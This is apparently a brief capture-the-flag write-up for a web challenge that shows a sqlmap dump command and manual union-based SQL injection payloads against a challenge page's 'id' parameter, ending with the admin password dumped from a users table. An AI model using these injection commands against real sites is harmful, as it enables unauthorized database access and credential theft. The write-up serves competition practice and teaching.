In The Name Of GOD;)

in page injectable on dbms sqlite

parameter id is injectable on string mode
use sqlmap for inject;)
<< sqlmap.py -u http://backdoor-problems.cognizance.org.in/web150/submit.php --data id=1 -p id --dump >>

sqlmap dump table & column name but, not abale dump data:(

use hackbar addons for inject manualy;)

url : << http://backdoor-problems.cognizance.org.in/web150/submit.php >>
Post data : << id=1' union select 1,nname,npassword from users-- >>

error in dumping:(
but:D
after several example found correct column name:D

<span>character "n" Should be removed from the <span>columns name:P

correct post data is : << id=1' union select 1,name,password from users-- >>

admin password dumped:P

sorry for bad english:P
</span></span>